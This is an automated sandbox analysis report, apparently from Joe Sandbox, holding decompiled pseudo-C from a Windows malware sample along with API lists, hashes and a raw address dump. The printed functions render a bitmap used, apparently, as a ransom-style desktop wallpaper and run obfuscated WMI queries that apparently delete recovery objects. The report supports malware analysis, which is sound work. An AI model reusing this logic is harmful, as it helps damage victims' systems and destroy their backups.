            0x00000000
            0x009bbc5a
            0x009bbbb1
            0x009bbbb6
            0x009bbbc5
            0x009bbbcb
            0x009bbbcc
            0x009bbbcc
            0x00000000
            0x009bbbb6
            0x009bb85c
            0x00000000
            0x009bb86b
            0x009bb86e
            0x009bbb4d
            0x009bbb5f
            0x009bbc10
            0x009bbc12
            0x009bbc14
            0x009bbc1d
            0x009bbc20
            0x009bbc20
            0x009bbb41
            0x009bbb41
            0x009bbb42
            0x00000000
            0x009bbb42
            0x009bbb67
            0x009bbb6c
            0x009bbb6c
            0x009bbb73
            0x009bbb76
            0x009bbb7a
            0x009bbb7d
            0x009bbb80
            0x009bbbd8
            0x009bbbda
            0x009bbbee
            0x009bbbf8
            0x009bbbfb
            0x009bbbff
            0x009bbc02
            0x009bbbdc
            0x009bbbdc
            0x009bbbdf
            0x009bbbdf
            0x009bbc05
            0x00000000
            0x009bbb82
            0x009bbb85
            0x009bbb88
            0x009bbb8a
            0x009bbb8d
            0x009bbb90
            0x009bbb90
            0x00000000
            0x009bbb88
            0x009bbb80
            0x009bbb4f
            0x009bbb52
            0x009bbb54
            0x00000000
            0x009bbb54
            0x009bb874
            0x009bb87a
            0x009bb87d
            0x009bb87f
            0x009bb882
            0x009bbb33
            0x009bbb38
            0x009bbb3d
            0x009bbb3d
            0x00000000
            0x009bbb38
            0x009bb888
            0x009bb88b
            0x009bbb23
            0x009bbb28
            0x009bbb2d
            0x009bbb2d
            0x00000000
            0x009bbb28
            0x009bb891
            0x009bb894
            0x009bbb13
            0x009bbb18
            0x009bbb1d
            0x009bbb1d
            0x00000000
            0x009bbb18
            0x009bb89a
            0x009bb89d
            0x009bbb03
            0x009bbb08
            0x009bbb0d
            0x009bbb0d
            0x00000000
            0x009bbb08
            0x009bb8a4
            0x009bb8a7
            0x009bbaf3
            0x009bbaf8
            0x009bbafd
            0x009bbafd
            0x00000000
            0x009bbaf8
            0x009bb8b0
            0x009bb8c2
            0x00000000
            0x00000000
            0x009bb8c8
            0x009bb8c9
            0x009bb8d0
            0x009bb8d5
            0x009bb8db
            0x00000000
            0x00000000
            0x009bb8e1
            0x009bb8e2
            0x009bb8e9
            0x009bb8ee
            0x009bb8f4
            0x00000000
            0x00000000
            0x009bb8fa
            0x009bb8fb
            0x009bb902
            0x009bb907
            0x009bb90d
            0x00000000
            0x00000000
            0x009bb913
            0x009bb914
            0x009bb91b
            0x009bb920
            0x009bb926
            0x00000000
            0x00000000
            0x009bb93c
            0x009bb94b
            0x009bb952
            0x009bb956
            0x009bb963
            0x009bba23
            0x009bba23
            0x009bba29
            0x009bba47
            0x009bba7a
            0x009bbab0
            0x009bbaba
            0x009bbac4
            0x009bbad0
            0x009bbae3
            0x009bbae7
            0x009bbaeb
            0x009bba6c
            0x009bba6c
            0x00000000
            0x009bba6c
            0x009bbab2
            0x00000000
            0x009bbab2
            0x009bba7e
            0x009bba85
            0x009bba8f
            0x009bbaa1
            0x009bbaa5
            0x009bbaa9
            0x00000000
            0x009bba80
            0x009bba80
            0x00000000
            0x009bba80
            0x009bba7e
            0x009bba4b
            0x009bba52
            0x009bba62
            0x009bba65
            0x009bba69
            0x00000000
            0x009bba4d
            0x009bba4d
            0x00000000
            0x009bba4d
            0x009bba2b
            0x009bba2d
            0x009bba32
            0x009bba32
            0x009bba35
            0x009bba36
            0x009bba36
            0x009bba39
            0x00000000
            0x009bba39
            0x009bba29
            0x009bb971
            0x00000000
            0x00000000
            0x009bb977
            0x009bb978
            0x009bb97e
            0x00000000
            0x00000000
            0x009bb984
            0x009bb985
            0x009bb98b
            0x00000000
            0x00000000
            0x009bb991
            0x009bb992
            0x009bb9a1
            0x00000000
            0x00000000
            0x009bb9a7
            0x009bb9a8
            0x009bb9af
            0x009bb9b4
            0x009bb9ba
            0x00000000
            0x00000000
            0x009bb9c0
            0x009bb9c1
            0x009bb9c8
            0x009bb9cd
            0x009bb9d3
            0x00000000
            0x00000000
            0x009bb9d9
            0x009bb9da
            0x009bb9e1
            0x009bb9e6
            0x009bb9ec
            0x00000000
            0x009bb9f2
            0x009bba0b
            0x009bba1a
            0x009bba21
            0x00000000
            0x009bba21
            0x009bb8b2
            0x009bb8b2
            0x00000000
            0x009bb8b2
            0x009bb8b0
            0x009bb85c
            0x009bb840

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: -
            • API String ID: 0-2547889144
            • Opcode ID: 08156435448e5f749d309a5ccb23b42de6a213d0f6e87e6ec814c0abee2cb9d4
            • Instruction ID: 1140031496a09659d0336977deb507ecbb8e5d5324d505a5d12f073bc7c61239
            • Opcode Fuzzy Hash: 08156435448e5f749d309a5ccb23b42de6a213d0f6e87e6ec814c0abee2cb9d4
            • Instruction Fuzzy Hash: 4782FEB1D002198FDF24CFA8CA817EEBBF9FF45320F68815AE491A7296D7749941CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B5126() {
            				long _v8;
            				WCHAR* _t3;
            				int _t5;
            				WCHAR* _t11;
            
            				_t3 = E009B494C(0x202);
            				_t11 = _t3;
            				if(_t11 != 0) {
            					_v8 = 0x101;
            					_t5 = GetUserNameW(_t11,  &_v8); // executed
            					if(_t5 == 0) {
            						E009B4999(_t11);
            						_t11 = 0;
            					}
            					_t3 = _t11;
            				}
            				return _t3;
            			}

            APIs
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • GetUserNameW.ADVAPI32(00000000,009B198A), ref: 009B5148
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Heap$CreateNameProcessUser
            • String ID:
            • API String ID: 499767188-0
            • Opcode ID: 6141771f7fec4b44d5188b2c1f93e44065e87d5e9cb7b0b2ccb515062aa04ace
            • Instruction ID: e20dea01ab9baf71b7b4f01aa6eebb302b301b130112ac162357b5a7b87f83f4
            • Opcode Fuzzy Hash: 6141771f7fec4b44d5188b2c1f93e44065e87d5e9cb7b0b2ccb515062aa04ace
            • Instruction Fuzzy Hash: 38E0CD72A156347B9624D7D8AD09BEFB79CCF02B70B11015AFD04D3342E7A08E0052E5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B53F1() {
            				struct _SYSTEM_INFO _v40;
            
            				GetSystemInfo( &_v40); // executed
            				return _v40.dwNumberOfProcessors;
            			}

            APIs
            • GetSystemInfo.KERNELBASE(?,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B53FB
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: 5efc24916ee7defb7e74d735080cc3c7d7198243687745be2c1bb854debff18e
            • Instruction ID: da66d65658efa77b86b35b9bbac0e9f1c8e82ebbc7198726a4613a52b3795762
            • Opcode Fuzzy Hash: 5efc24916ee7defb7e74d735080cc3c7d7198243687745be2c1bb854debff18e
            • Instruction Fuzzy Hash: 71C04C79D0820C978B00EAE5994989AB7BCA60A501B400591ED1993201E635E95487A5
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 91%
            			E009B46DE() {
            				signed int _v8;
            				int _v12;
            				signed int _v16;
            				struct HDC__* _v20;
            				void* _v24;
            				int _v28;
            				struct HDC__* _v32;
            				int _v36;
            				void* _v40;
            				struct tagRECT _v56;
            				struct HDC__* _t56;
            				struct HDC__* _t57;
            				int _t59;
            				int _t60;
            				int _t61;
            				void* _t62;
            				int _t67;
            				void* _t68;
            				struct HBRUSH__* _t73;
            				signed int _t77;
            				int _t91;
            				signed int _t92;
            				signed int _t94;
            				signed int _t96;
            				struct HDC__* _t101;
            				struct HDC__* _t102;
            				signed int _t104;
            				signed int _t111;
            				signed int _t112;
            				signed char _t114;
            				int _t121;
            				void* _t123;
            				struct HDC__* _t128;
            				int _t132;
            				int _t133;
            				void* _t134;
            
            				_t56 = GetDC(0);
            				_t101 = _t56;
            				_v32 = _t101;
            				if(_t101 != 0) {
            					_t57 = CreateCompatibleDC(_t101); // executed
            					_t128 = _t57;
            					_v20 = _t128;
            					if(_t128 == 0) {
            						L17:
            						return ReleaseDC(0, _t101);
            					}
            					_t59 = GetDeviceCaps(_t101, 8);
            					_t121 = _t59;
            					_t60 = 0xa;
            					_v28 = _t121;
            					_v16 = _t60;
            					_t61 = GetDeviceCaps(_t101, _t60);
            					_v8 = _t61;
            					_t62 = CreateCompatibleBitmap(_t101, _t121, _t61); // executed
            					_v24 = _t62;
            					if(_t62 == 0) {
            						L16:
            						DeleteDC(_t128);
            						goto L17;
            					}
            					SelectObject(_t128, _t62);
            					_t67 =  ~(MulDiv(0x12, GetDeviceCaps(_t101, 0x5a), 0x48));
            					_v36 = _t67;
            					_t68 = CreateFontW(_t67, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, 0);
            					_v40 = _t68;
            					if(_t68 == 0) {
            						L15:
            						DeleteObject(_v24);
            						goto L16;
            					}
            					SelectObject(_t128, _t68);
            					SetBkMode(_t128, 1);
            					SetTextColor(_t128, 0xffffff);
            					_t73 = GetStockObject(2);
            					_v56.left = _v56.left & 0x00000000;
            					_v56.top = _v56.top & 0x00000000;
            					_v56.right = _t121;
            					_v56.bottom = _v8;
            					FillRect(_t128,  &_v56, _t73);
            					_t104 = _v8;
            					_t77 = _t104 * _t121;
            					asm("cdq");
            					_t114 = _t77 % _v16;
            					if(_t77 / _v16 <= 0) {
            						L12:
            						asm("cdq");
            						asm("cdq");
            						_v56.top = (_v56.bottom - _t114 >> 1) - (_v8 - _t114 >> 1) - _v36;
            						DrawTextW(_t128,  *0x9c2264, 0xffffffff,  &_v56, 0x11); // executed
            						_t123 = E009B45D9(_t114, _t144);
            						if(_t123 != 0) {
            							E009B4424(_t114, _v24, _t101, _t123); // executed
            							 *0x9c1060(0x14, 0, _t123, 3); // executed
            							E009B4999(_t123);
            						}
            						DeleteObject(_v40);
            						goto L15;
            					}
            					_t91 = 0;
            					_v12 = 0;
            					if(_t121 <= 0) {
            						goto L12;
            					}
            					_t102 = _t128;
            					do {
            						_v16 = _v16 & 0x00000000;
            						if(_t104 <= 0) {
            							goto L10;
            						} else {
            							goto L8;
            						}
            						do {
            							L8:
            							_t92 = E009B54CC(_t114, 0, 0xffffffff);
            							_t94 = E009B54CC(_t92 % 0xc8, 0, 0xffffffff);
            							_t111 = 0x1e;
            							_t96 = E009B54CC(_t94 % _t111, 0, 0xffffffff);
            							_t134 = _t134 + 0x18;
            							_t132 = _v16;
            							_t112 = 0x1e;
            							_t114 = _t96 % _t112;
            							SetPixel(_t102, _v12, _t132, _t114 & 0x000000ff | (_t94 % _t111 & 0x000000ff | (_t92 % 0x000000c8 & 0x000000ff) << 0x00000008) << 0x00000008); // executed
            							_t104 = _v8;
            							_t133 = _t132 + 1;
            							_v16 = _t133;
            						} while (_t133 < _t104);
            						_t121 = _v28;
            						_t91 = _v12;
            						L10:
            						_t91 = _t91 + 1;
            						_v12 = _t91;
            						_t144 = _t91 - _t121;
            					} while (_t91 < _t121);
            					_t101 = _v32;
            					_t128 = _v20;
            					goto L12;
            				}
            				return _t56;
            			}

            APIs
            • GetDC.USER32(00000000), ref: 009B46E7
            • CreateCompatibleDC.GDI32(00000000), ref: 009B46FC
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 009B4713
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 009B4726
            • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 009B4732
            • SelectObject.GDI32(00000000,00000000), ref: 009B4745
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009B474E
            • MulDiv.KERNEL32(00000012,00000000,00000048), ref: 009B4759
            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 009B4776
            • SelectObject.GDI32(00000000,00000000), ref: 009B4789
            • SetBkMode.GDI32(00000000,00000001), ref: 009B4792
            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 009B479E
            • GetStockObject.GDI32(00000002), ref: 009B47A6
            • FillRect.USER32(00000000,00000000,00000000), ref: 009B47C3
            • SetPixel.GDI32(00000000,?,00000000,00000000), ref: 009B4845
            • DrawTextW.USER32(00000000,000000FF,00000000,00000011,?), ref: 009B4893
            • KiUserCallbackDispatcher.NTDLL(00000014,00000000,00000000,00000003), ref: 009B48B8
            • DeleteObject.GDI32(?), ref: 009B48C8
            • DeleteObject.GDI32(?), ref: 009B48D1
            • DeleteDC.GDI32(00000000), ref: 009B48D8
            • ReleaseDC.USER32(00000000,00000000), ref: 009B48E2
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Object$CapsCreateDeleteDevice$CompatibleSelectText$BitmapCallbackColorDispatcherDrawFillFontModePixelRectReleaseStockUser
            • String ID:
            • API String ID: 3972642514-0
            • Opcode ID: 8b67dc380df49cc9779721fe4ec72ca31c22e60ff5ea222c45933cf47a6c8560
            • Instruction ID: e2318f3c17d2cfd9c25bdb8990d9a8fa3d44b9d8359ae901cd5cdc7982a5c7c0
            • Opcode Fuzzy Hash: 8b67dc380df49cc9779721fe4ec72ca31c22e60ff5ea222c45933cf47a6c8560
            • Instruction Fuzzy Hash: 02510371E14215BFEB049FA4DD49FEE7BB9EF89321F100119FA11E22D2DB708900AB64
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 65 9b4424-9b443e GetObjectW 66 9b45d4-9b45d8 65->66 67 9b4444-9b4456 65->67 68 9b4458-9b445a 67->68 69 9b445c-9b4462 67->69 70 9b4482-9b448f 68->70 69->70 71 9b4464-9b446a 69->71 72 9b4490-9b44c2 LocalAlloc 70->72 71->70 73 9b446c-9b4472 71->73 75 9b44cb-9b44fb GlobalAlloc 72->75 76 9b44c4-9b44c8 72->76 73->70 74 9b4474-9b4477 73->74 77 9b4479-9b447d 74->77 78 9b447f-9b4481 74->78 79 9b45d2-9b45d3 75->79 80 9b4501-9b4518 GetDIBits 75->80 76->75 77->72 78->70 79->66 80->79 81 9b451e-9b453b CreateFileW 80->81 81->79 82 9b4541-9b4585 WriteFile 81->82 83 9b4587-9b45a2 WriteFile 82->83 84 9b45a4-9b45a5 82->84 83->84 85 9b45a7-9b45bb WriteFile 83->85 86 9b45bd-9b45c3 call 9b4bee 84->86 85->86 87 9b45c5-9b45cc call 9b4bee GlobalFree 85->87 86->79 87->79
            C-Code - Quality: 77%
            			E009B4424(signed int __edx, void* _a4, struct HDC__* _a8, WCHAR* _a12) {
            				long _v8;
            				intOrPtr _v14;
            				intOrPtr _v18;
            				intOrPtr _v22;
            				void _v24;
            				signed int _v30;
            				signed int _v32;
            				signed short _v40;
            				intOrPtr _v44;
            				char _v48;
            				int _t45;
            				signed int _t48;
            				void* _t57;
            				long _t63;
            				void* _t64;
            				int _t74;
            				int _t78;
            				int _t80;
            				int _t83;
            				void* _t84;
            				signed int _t96;
            				void* _t104;
            				int _t106;
            				void* _t107;
            
            				_t96 = __edx;
            				_push( &_v48);
            				_t106 = 0x18;
            				_t45 = GetObjectW(_a4, _t106, ??);
            				if(_t45 != 0) {
            					_t48 = _v30 * _v32 & 0x0000ffff;
            					if(_t48 != 1) {
            						_t83 = 4;
            						if(_t48 <= _t83) {
            							L9:
            							_push(0x28 + (1 << _t83) * 4);
            							L10:
            							_t107 = LocalAlloc(0x40, ??);
            							 *_t107 = 0x28;
            							 *((intOrPtr*)(_t107 + 4)) = _v44;
            							 *(_t107 + 8) = _v40;
            							 *((short*)(_t107 + 0xc)) = _v32;
            							 *((short*)(_t107 + 0xe)) = _v30;
            							_t57 = 0x18;
            							if(_t83 < _t57) {
            								 *(_t107 + 0x20) = 1 << _t83;
            							}
            							asm("cdq");
            							 *((intOrPtr*)(_t107 + 0x10)) = 0;
            							 *((intOrPtr*)(_t107 + 0x24)) = 0;
            							_t63 = ( *((intOrPtr*)(_t107 + 4)) + 7 + (_t96 & 0x00000007) >> 3) * (_t83 & 0x0000ffff) *  *(_t107 + 8);
            							 *(_t107 + 0x14) = _t63;
            							_t64 = GlobalAlloc(0, _t63); // executed
            							_t84 = _t64;
            							if(_t84 == 0) {
            								L21:
            								return _t64;
            							} else {
            								_t64 = GetDIBits(_a8, _a4, 0,  *(_t107 + 8) & 0x0000ffff, _t84, _t107, 0);
            								if(_t64 == 0) {
            									goto L21;
            								}
            								_t64 = CreateFileW(_a12, 0xc0000000, 0, 0, 2, 0x80, 0); // executed
            								_t104 = _t64;
            								if(_t104 == 0xffffffff) {
            									goto L21;
            								}
            								_v24 = 0x4d42;
            								_v22 =  *_t107 +  *(_t107 + 0x14) +  *(_t107 + 0x20) * 4 + 0xe;
            								_v18 = 0;
            								_v14 =  *_t107 +  *(_t107 + 0x20) * 4 + 0xe;
            								_t74 = WriteFile(_t104,  &_v24, 0xe,  &_v8, 0); // executed
            								if(_t74 == 0) {
            									L17:
            									_push(_t104);
            									L19:
            									_t64 = E009B4BEE();
            									goto L21;
            								}
            								_t78 = WriteFile(_t104, _t107, 0x28 +  *(_t107 + 0x20) * 4,  &_v8, 0); // executed
            								if(_t78 != 0) {
            									_t80 = WriteFile(_t104, _t84,  *(_t107 + 0x14),  &_v8, 0); // executed
            									_push(_t104);
            									if(_t80 != 0) {
            										E009B4BEE();
            										_t64 = GlobalFree(_t84); // executed
            										goto L21;
            									}
            									goto L19;
            								}
            								goto L17;
            							}
            						}
            						_t83 = 8;
            						if(_t48 <= _t83) {
            							goto L9;
            						}
            						_t83 = 0x10;
            						if(_t48 <= _t83) {
            							goto L9;
            						}
            						if(_t48 > _t106) {
            							_t83 = 0x20;
            							goto L9;
            						}
            						_t83 = _t106;
            						_push(0x28);
            						goto L10;
            					}
            					_t83 = 1;
            					goto L9;
            				}
            				return _t45;
            			}
            0x009b4424
            0x009b442e
            0x009b4431
            0x009b4436
            0x009b443e
            0x009b4450
            0x009b4456
            0x009b445e
            0x009b4462
            0x009b4482
            0x009b448f
            0x009b4490
            0x009b4498
            0x009b449c
            0x009b44a5
            0x009b44ab
            0x009b44b2
            0x009b44ba
            0x009b44be
            0x009b44c2
            0x009b44c8
            0x009b44c8
            0x009b44d6
            0x009b44da
            0x009b44df
            0x009b44e8
            0x009b44ee
            0x009b44f1
            0x009b44f7
            0x009b44fb
            0x009b45d2
            0x00000000
            0x009b4501
            0x009b4510
            0x009b4518
            0x00000000
            0x00000000
            0x009b4530
            0x009b4536
            0x009b453b
            0x00000000
            0x00000000
            0x009b4546
            0x009b455c
            0x009b4561
            0x009b456f
            0x009b457d
            0x009b4585
            0x009b45a4
            0x009b45a4
            0x009b45bd
            0x009b45bd
            0x00000000
            0x009b45c2
            0x009b459a
            0x009b45a2
            0x009b45b2
            0x009b45b8
            0x009b45bb
            0x009b45c5
            0x009b45cc
            0x00000000
            0x009b45cc
            0x00000000
            0x009b45bb
            0x00000000
            0x009b45a2
            0x009b44fb
            0x009b4466
            0x009b446a
            0x00000000
            0x00000000
            0x009b446e
            0x009b4472
            0x00000000
            0x00000000
            0x009b4477
            0x009b4481
            0x00000000
            0x009b4481
            0x009b4479
            0x009b447b
            0x00000000
            0x009b447b
            0x009b4458
            0x00000000
            0x009b4458
            0x009b45d8

            APIs
            • GetObjectW.GDI32(00000000,00000018,?,00000000,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B4436
            • LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B4492
            • GlobalAlloc.KERNELBASE(00000000,?,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B44F1
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 009B4510
            • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,009B48AE,?,00000000), ref: 009B4530
            • WriteFile.KERNELBASE(00000000,009B48AE,0000000E,?,00000000,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B457D
            • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B459A
            • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,?,?,?,?,009B48AE,?,00000000,00000000), ref: 009B45B2
            • GlobalFree.KERNEL32(00000000), ref: 009B45CC
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: File$Write$AllocGlobal$BitsCreateFreeLocalObject
            • String ID:
            • API String ID: 351847640-0
            • Opcode ID: 886c7d7106e412e85a88cc71e63ea497088c877ea0d03caaba68292d1a7efc19
            • Instruction ID: 5402d97acb97c2cdddbdca5a5344b2453fff9e2b049e5426f30097ebeb27b704
            • Opcode Fuzzy Hash: 886c7d7106e412e85a88cc71e63ea497088c877ea0d03caaba68292d1a7efc19
            • Instruction Fuzzy Hash: D551DD75600209AFD7209FA5CD44FAAB7FCEF49760F00841AFA86C7291D670E911EB24
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 92 9b2923-9b2939 94 9b293b-9b293e 92->94 95 9b2943-9b295c 92->95 96 9b2b72-9b2b76 94->96 98 9b295e-9b2961 95->98 99 9b2966-9b2978 call 9b5327 95->99 98->96 102 9b297a-9b299e VariantInit 99->102 103 9b29a8-9b29c4 99->103 105 9b29a2-9b29a6 VariantClear 102->105 106 9b29ca-9b2a05 call 9b5e33 103->106 107 9b2b5f-9b2b68 103->107 105->103 106->107 113 9b2a0b-9b2a1e 106->113 112 9b2b6e-9b2b71 107->112 112->96 113->107 115 9b2a24-9b2a84 call 9b5e33 * 2 113->115 115->107 121 9b2a8a 115->121 122 9b2b3e-9b2b52 121->122 123 9b2b56-9b2b59 122->123 123->107 124 9b2a8f-9b2aa6 123->124 126 9b2b2f-9b2b3c VariantClear 124->126 127 9b2aac-9b2ab1 124->127 126->122 127->126 128 9b2ab3-9b2afd call 9b49d3 call 9b5e33 wsprintfW 127->128 134 9b2b29-9b2b2d VariantClear 128->134 135 9b2aff-9b2b26 call 9b49d3 128->135 134->126 135->134
            C-Code - Quality: 16%
            			E009B2923() {
            				void* _v8;
            				void* _v12;
            				void* _v16;
            				void* _v20;
            				void* _v24;
            				void* _v28;
            				short _v30;
            				char _v36;
            				char _v44;
            				intOrPtr _v52;
            				char _v60;
            				short _v64;
            				char _v84;
            				short _v88;
            				short _v136;
            				short _v140;
            				char _v200;
            				short _v456;
            				void* _t57;
            				void* _t58;
            				intOrPtr* _t61;
            				intOrPtr* _t68;
            				void* _t70;
            				intOrPtr* _t77;
            				intOrPtr* _t79;
            				intOrPtr* _t81;
            				intOrPtr* _t83;
            				int _t94;
            				intOrPtr* _t97;
            				intOrPtr* _t102;
            				void* _t106;
            				short _t110;
            				intOrPtr* _t133;
            				void* _t135;
            				void* _t136;
            				void* _t137;
            
            				_push(0);
            				_push(0);
            				if( *0x9c12c0() >= 0) {
            					_t57 =  *0x9c1320(0x9bd104, 0, 1, 0x9bd0f4,  &_v16); // executed
            					if(_t57 >= 0) {
            						_t58 = E009B5327(); // executed
            						_t133 = __imp__#9;
            						_t110 = 3;
            						if(_t58 != 0) {
            							__imp__#8( &_v44);
            							_t102 = _v16;
            							_v44 = _t110;
            							_v36 = 0x40;
            							 *((intOrPtr*)( *_t102 + 0x20))(_t102, L"__ProviderArchitecture", 0,  &_v44);
            							 *_t133( &_v44);
            						}
            						_push( &_v28);
            						_push(0x9bd134);
            						_push(0x4401);
            						_push(0);
            						_push(0x9bd114);
            						if( *0x9c1320() < 0) {
            							L18:
            							_t61 = _v28;
            							 *((intOrPtr*)( *_t61 + 8))(_t61);
            							 *0x9c12d4(); // executed
            							return 0;
            						} else {
            							E009B5E33(0x9c0270, 0x24a, 0xe, 0x14,  &_v84);
            							_t136 = _t135 + 0x14;
            							_v64 = 0;
            							_t68 = _v28;
            							_push( &_v12);
            							_push(_v16);
            							_push(0);
            							_push(0);
            							_push(0);
            							_push(0);
            							_push(0);
            							_push( &_v84);
            							_push(_t68); // executed
            							if( *((intOrPtr*)( *_t68 + 0xc))() < 0) {
            								goto L18;
            							}
            							_t70 =  *0x9c1084(_v12, 0xa, 0, 0, _t110, _t110, 0, 0); // executed
            							if(_t70 < 0) {
            								goto L18;
            							}
            							_v20 = 0;
            							E009B5E33(0x9c0270, 0xc4, 0xe, 6,  &_v36);
            							_v30 = 0;
            							E009B5E33(0x9c0270, 0xb4f, 0xe, 0x3c,  &_v200);
            							_t137 = _t136 + 0x28;
            							_v140 = 0;
            							_t77 = _v12;
            							_push( &_v20);
            							_push(0);
            							_push(0x30);
            							_push( &_v200);
            							_push( &_v36);
            							_push(_t77); // executed
            							if( *((intOrPtr*)( *_t77 + 0x50))() < 0) {
            								goto L18;
            							}
            							while(1) {
            								_t79 = _v20;
            								_v8 = 0;
            								 *((intOrPtr*)( *_t79 + 0x10))(_t79, 0xffffffff, 1,  &_v24,  &_v8);
            								if(_v8 == 0) {
            									goto L18;
            								}
            								_t81 = _v24;
            								_push(0);
            								_push(0);
            								_push( &_v60);
            								_push(0);
            								_push(L"id");
            								_push(_t81);
            								if( *((intOrPtr*)( *_t81 + 0x10))() >= 0 && _v60 == 8) {
            									E009B49D3( &_v456, 0, 0x100);
            									E009B5E33(0x9c0270, 0x40a, 0x10, 0x30,  &_v136);
            									_v88 = 0;
            									_t94 = wsprintfW( &_v456,  &_v136, _v52);
            									_t137 = _t137 + 0x2c;
            									if(_t94 != 0) {
            										_t97 = _v12;
            										 *((intOrPtr*)( *_t97 + 0x40))(_t97,  &_v456, 0, _v16, 0);
            										E009B49D3( &_v456, 0, 0x80);
            										_t137 = _t137 + 0xc;
            									}
            									 *_t133( &_v60);
            								}
            								_t83 = _v24;
            								 *((intOrPtr*)( *_t83 + 8))(_t83);
            								 *_t133( &_v60);
            							}
            							goto L18;
            						}
            					}
            					_t106 = 2;
            					return _t106;
            				}
            				return 1;
            			}
            0x009b292f
            0x009b2930
            0x009b2939
            0x009b2954
            0x009b295c
            0x009b2968
            0x009b296d
            0x009b2975
            0x009b2978
            0x009b297e
            0x009b2984
            0x009b298c
            0x009b2990
            0x009b299f
            0x009b29a6
            0x009b29a6
            0x009b29ab
            0x009b29ac
            0x009b29b1
            0x009b29b6
            0x009b29b7
            0x009b29c4
            0x009b2b5f
            0x009b2b5f
